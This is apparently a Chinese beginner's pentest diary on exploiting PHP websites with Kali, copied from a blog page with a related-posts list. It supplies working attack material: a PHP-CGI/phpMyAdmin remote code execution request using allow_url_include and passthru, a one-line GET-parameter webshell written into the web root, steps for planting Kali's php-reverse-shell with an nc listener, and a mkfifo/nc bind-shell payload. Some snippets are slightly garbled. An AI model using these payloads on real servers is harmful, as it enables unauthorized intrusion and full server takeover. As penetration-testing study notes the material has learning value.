kali PHP网站渗透,小白日记35:kali渗透测试之Web渗透
手动漏洞挖掘
即扫描后,如何对发现的漏洞告警进行验证。
#默认安装
流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。
漏洞类型--远程命令执行
1、phpMyadmin
安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。
a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)
###有账号密码限制,可尝试爆破###
b.尝试../phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】
###安全最佳实践角度:不允许从公网访问phpMyAdmin目录或禁用访问setup目录
c.早期的phpmyadmin有漏洞【可通过在URL地址编辑或者定制发送的指令,使其执行一个PHP页面】
例如:
POST http://192.168.20.10/phpMyAdmin/-d+allow_url_include%3d1+-d
+auto_prepend_file%3dphp://input HTTP/1.1 #修改服务器中的php.ini文件
Host: 192.168.20.10
passthru('id');
die(); #后面的指令不执行,可屏蔽服务器返回的html代码等杂信息
?>
#编辑一条配置指令来修改php.ini文件,可编写任何功能的PHP页面【可调用系统功能,passthru()】
#可能运行web服务器进程的用户账号会被限制为www-data之类的普通用户账号,则需经过提权,才能完全控制服务器
Burpsuite重放
#已获得www-data用户权限,可进行ls、cat等操作【pwd:查看当前路径;catetc/password:查看用户账号】
#搜索PHP文件中是否用硬编码的账号密码
#尝试写入网页木马,控制服务器
注:此漏洞有可能不被扫描器扫出来,可自己手工验证
d.网页木马
kali军火库中可以找到现成的网页木马
静态木马webshell,通过浏览器去访问
例如:echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php【最简单的木马】
“\”防止在上传过程中,变量被过滤
在浏览器中执行命令【注:无法直接访问3.php目录,需加问号再执行】
反弹shell【提交一个请求(包含一个反弹shell)】
#账号一般还是会是普通用户【kali中有各种类型的shell】
root@kali:/usr/share/webshells# ls
asp aspx cfm jsp perl php
root@kali:/usr/share/webshells# cd php
root@kali:/usr/share/webshells/php# ls
findsock.c php-findsock-shell.php qsd-php-backdoor.php
php-backdoor.php php-reverse-shell.php simple-backdoor.php
root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /root/3.php
root@kali:/usr/share/webshells/php##修改shell中反弹连接的IP
#使用nc侦听反弹端口1234【nc终端无法使用tab键】
#将shell代码复制粘贴进POST,go发送【此方法相对隐蔽,不易发现】
############################################################################
当一些命令如ifconfig无法使用时
#################################################################################
2、CGI模块【Ubuntu / Debian 默认安装PHP5-CGI】
#可直接访问/cgi-bin/php5和/cgi-bin/php(这两个目录大部分无法爬取)#因为其不在/var/www目录下
#定制编码shellcode
#使服务器打开一个端口,然后再使用nc去连接获得shell
echo system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
?>
#若有防火墙,需确定防火墙允许通过
kali PHP网站渗透,小白日记35:kali渗透测试之Web渗透相关推荐
- kali安装keylogger_小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser...
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...
- 小白日记29:kali渗透测试之Web渗透-扫描工具-Vega
WEB扫描工具-Vega 纯图形化界面,Java编写的开源web扫描器.两种工作模式:扫描模式和代理模式[主流扫描功能].用于爬站.处理表单,注入测试等.支持SSL:http://vega/ca.cr ...
- web渗透、内网渗透,6个月以来的学习感受
2022年5月,正式认识了网安这个行业,而此时的我已经34岁了,有自己的本职工作,出于浓厚的兴趣,上班之余开始了我的网安学习之路. 一.我的学习渠道: 1.花钱报班 报的哪个教育机构就不说了,现成的资 ...
- 【web渗透】专栏文章汇总
一.基础部分 web渗透–1–写在开始 web渗透–2–web安全原则(上) web渗透–3–web安全原则(下) web渗透–4–web渗透测试清单 web渗透–5–自动化漏洞扫描 web渗透–6– ...
- 小白日记10:kali渗透测试之端口扫描-UDP、TCP、僵尸扫描、隐蔽扫描
端口扫描 二三四层发现的目的只是为了准确发现所有活着主机IP,确定攻击面,端口扫描即发现攻击点,发现开放端口.端口对应网络服务及应用端程序,服务端程序的漏洞通过端口攻入.[所有的扫描结果,都不要完全相 ...
- 小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1.上传各种工具 2.提权:为了全面控制目标系统 3.擦除攻击痕迹:防止管理员通过日 ...
- 小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0
Linux系统下穿越火线-缓冲区溢出 原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞. 工具: 调试工具:edb: ###python在漏洞溢出方面的渗透测 ...
- 小白日记22:kali渗透测试之提权(二)--抓包嗅探
抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议, ...
- 小白日记21:kali渗透测试之提权(一)--本地提权
本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...
- 小白日记5:kali渗透测试之被动信息收集(四)--theHarvester,metagoofil,meltag,个人专属密码字典--CUPP
1.theHarvester theHarvester是一个社会工程学工具,它通过搜索引擎.PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息. ...
最新文章
- 阿里云服务器如何加强服务器的安全?有哪些安全措施?
- 学习型php空间,补装修日记:学习型业主三大要素
- 先锋展示了可爱鸟形车载机器
- Java对象的引用类型
- 窗体案例:注册 登陆 主界面 c# 1613533126
- 距离度量方式(马氏距离,欧式距离,曼哈顿距离)
- 重读经典:完全解析特征学习大杀器 ResNet
- 【Java数据结构】赫夫曼树
- Theatre.js 动画JavaScript库
- MFC学习笔记(1)
- 《R语言初学指南》一1.4 实际案例
- FPGA的学习历程-入门篇
- 我的Windows Server 2008激活
- EA量化交易是什么?外汇EA量化交易可靠吗?
- C++“打鱼晒网”问题
- 如何用微博传播小电影
- [Unity][C#]Regex正则表达式判断字符串
- 2.3 连续性随机变量
- 电蚊拍一天用30-50次?
- 【持续更新】1999-2023年英伟达历代桌面GeForce显卡列表,GeForce显卡发布日期